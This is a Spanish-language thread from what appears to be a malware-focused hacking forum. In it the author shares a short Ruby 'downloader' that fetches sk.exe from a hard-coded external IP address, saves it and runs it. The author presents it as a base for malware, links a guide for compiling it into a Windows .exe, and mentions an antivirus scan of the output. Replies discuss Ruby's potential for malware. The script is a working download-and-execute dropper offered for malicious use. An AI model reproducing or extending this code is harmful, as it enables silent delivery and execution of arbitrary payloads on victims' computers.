Bueno aqui estuve haciendo un simple downloader para ruby , lo hice como prueba para saber como actuaría en un entorno "de malware" , es muy básico pero tampoco lo voy a dar todo masticado , esta es una base a la cual podeís añadir cosillas para que sea una gran tool.

Código :

Código: Seleccionar todo

require 'Win32API'
require 'open-uri'

=begin
----------------------------------
| Coded by Sanko              |
| Simple Ruby Downloader |
----------------------------------
=end

archivo = 'sk.exe' #Nombre del archivo a descargar
url = 'http://199.91.152.95/cz989jnk55qg/67fcyfx9xsf31mz/sk.exe' #Url directa del archivo a descargar

archivo = open(archivo,"wb") #se abre se escribe se lee y se cierra , lo que viene siendo una descarga...
archivo.write(open(url).read)
archivo.close

aplicacion = Thread.start do #Hacemos que system ejecute el archivo descargado
	system 'sk.exe'
end
Para poder ejecutarlo en un entorno windows sin necesidad de que este disponga de un "emulador" para el lenguaje podeís convertir vuestro script.rb en una aplicación .exe , aqui os dejo el tutorial que hace un rato hice :

http://www.indetectables.net/viewtopic.php?f=99&t=42609

Lo peor de todo es que al pasarlo a .exe con ocra el tamaño de este pequeño código como cualquier otro aumenta considerablemente.
Aun asi puede decirse que no hay mucha gente que use ruby en un entorno hacia el malware , pero tiene futuro :

scanner de la aplicación :

Mostrar/Ocultar

Gracias Elsuc por escanearme el archivo.

Y aqui una muestra de como se comporta :

Imagen
Última edición por sanko el 13 Sep 2012, 01:35, editado 1 vez en total.
con los tutos y ahora esto, me has llegado a intresar mucho en este lenguaje, gracias bro creo que me voy a dedicar con este
Imagen

Firma gracias a Bibetto

skype:ELBARTOkpc
ELBARTOkpc escribió:con los tutos y ahora esto, me has llegado a intresar mucho en este lenguaje, gracias bro creo que me voy a dedicar con este
claro bro , nadie se fija en el potencial de ruby pero cuando lo ves quieres saber mas y mas.
y eso pasa con todos los lenguajes de script
Responder

Volver a “Fuentes”